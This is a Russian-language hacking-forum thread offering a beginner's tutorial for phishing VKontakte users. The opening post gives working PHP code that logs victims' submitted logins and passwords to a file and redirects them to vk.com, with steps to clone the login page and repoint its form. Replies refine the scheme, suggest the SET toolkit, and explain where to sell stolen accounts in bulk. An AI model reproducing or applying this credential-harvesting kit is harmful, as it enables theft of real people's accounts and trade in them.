Самый просто фишинг для начинающих!

Тема в разделе "Взлом и уязвимости", создана пользователем Bombardir, 16 сен 2016.

  1. Bombardir

    Bombardir

    Сообщения:
    84
    Баллы:
    6
    Внимание!!!
    Этот способ просто баян,
    но все же я опубликовал
    тему для начинающих.

    И так для начала разберёмся что такое фишинг. Цитирую
    "Фишинг — это когда всеми возможными правдами и неправдами у вас пытаются узнать различные персональные данные (пароли, логины, номера банковских карт и счетов). Смысл заключается в том, чтобы побудить вас перейти по фишинговый ссылке на фишинговую страницу, где под различными предлогами выудить персональную информацию."

    И сегодня мы создадим фишинговую страницу. Создавать мы её будем для социальной сети вконтакте.
    1. Переходим на http://vk.com/.
    2. Жмем правой кнопкой мыши на страницу -> Сохранить как.
    3. Создаём файл Login.php.
    5. Запишем в файл этот скрипт:
    <?PHP
    $Log = $_POST['email'];//получаем логин
    $Pass = $_POST['pass'];//получаем пароль
    $log = fopen("passwords.txt","at");
    fwrite($log,"\n $Log:$Pass \n");//записываем их в файл
    fclose($log);
    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vk.com'></head></html>"; // перенаправляем на вк
    ?>

    6. Открываем html файл который мы сохранили в текстовом редакторе и ищем строчку
    <form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
    Нужно заменить её на
    <form method="POST" name="login" id="quick_login_form" action="Login.php">
    Т.Е мы подключили php скрипт для получения формы авторизации.
    Дело осталось за малым, залить всё это на хостинг с поддержкой php.
    После создания страницы в дело вступает СИ.
  2. Ленин

    Ленин

    Сообщения:
    170
    Баллы:
    16
    подойдет для любого сайта я так понял?
  3. Barbarossa

    Barbarossa

    Сообщения:
    225
    Баллы:
    16
  4. Trstmn

    Trstmn

    Сообщения:
    244
    Баллы:
    16
    Дополнить нужно скрипт: не просто редирект на вк, а отправка данных введённых в форму. Тогда лох сразу после ввода данных авторизуется в вк и у него даже тени сомнений не возникает.

    Дополню. Создаём файл passwords.txt и после заливки на хостинг выставляем ему права на запись. А то народ просто твою форму начнёт заливать и нифига у него пароли не будут записываться )). Когда я так делал я php не знал ) 60$ платил за то, чтобы мне "починили" скрипт.
  5. Deff

    Deff

    Сообщения:
    162
    Баллы:
    16
    Разницы особой нет, и так и так происходит редирект на вк.
    Если точечно работать, конечно лучше включать проверку авторизации, но при большом трафе скрипт проверки перестает работать (вк банит на время ip) и его всё-равно приходится отключать.
  6. Slava

    Slava

    Сообщения:
    9
    Баллы:
    1
    Polezno,spasibo
  7. Huracan

    Huracan

    Сообщения:
    47
    Баллы:
    6
    То есть если я правильно понял, пользователь которому скинуть эту ссылку пройдет по ней, и я могу получить его логин и пасс?
  8. evaporator

    evaporator

    Сообщения:
    208
    Баллы:
    16
    Ты получаешь логин и пароль, если жертва перешла по твоей ссылке и, ничего не подозревая, ввела их в соответствующие поля.
  9. Кристофер Молтисанти

    Кристофер Молтисанти

    Сообщения:
    34
    Баллы:
    6
    А куда потом можно продать аккаунты?где сразу пачку возьмут?
  10. Deff

    Deff

    Сообщения:
    162
    Баллы:
    16
    Можно поднять свой магаз, если есть стабильный поток акков, например через deer.io. Можно продать оптом перекупам, но они возьмут дешевле. Или искать клиентов размещая темы о продаже на форумах, типа этого.
  11. pole4

    pole4

    Сообщения:
    10
    Баллы:
    1
    Не знал что так возможно, спасибо огромное. Щас будем тестить
  12. lewa_vlad

    lewa_vlad

    Сообщения:
    119
    Баллы:
    16
    на всех хостингах выбивает такую шляпу. [​IMG]
  13. UBER

    UBER

    Сообщения:
    7
    Баллы:
    1
    Может кому и пригодится, но он рили баян.
  14. risha_b

    risha_b

    Сообщения:
    13
    Баллы:
    1
    А не легче SET'ом? Там есть функция копирования страницы логина, все быстро и просто.
  15. +Vampir+

    +Vampir+

    Сообщения:
    96
    Баллы:
    6
    Либо прав нет на запись или не находит файл, или путь ееверный.
  16. Stanley

    Stanley

    Сообщения:
    41
    Баллы:
    8
    Баян, не баян. Главное здесь работоспособность.
  17. SCRT1

    SCRT1

    Сообщения:
    17
    Баллы:
    1
    Однажды я наткнулся на такую страницу, благо открыты глаза. Понял все по адресной строке)) И вместо полей логин/пасс написал какой же он "аххуенный хакер" раза тридцать наверное. Знаю что идут логи, и ну он походу загрустил когда прочитал)) с полными лохами сработает конечно, а так баян еще тот
  18. okorch2015

    okorch2015

    Сообщения:
    98
    Баллы:
    6
    Схема старая, но действительно еще рабочая. Можно выжать еще соки. Если язык хорошо подвешен, то не составит труда
  19. Донцова

    Донцова

    Сообщения:
    6
    Баллы:
    1
  20. Karl001

    Karl001

    Сообщения:
    109
    Баллы:
    16
    Актуально ?

Поделиться этой страницей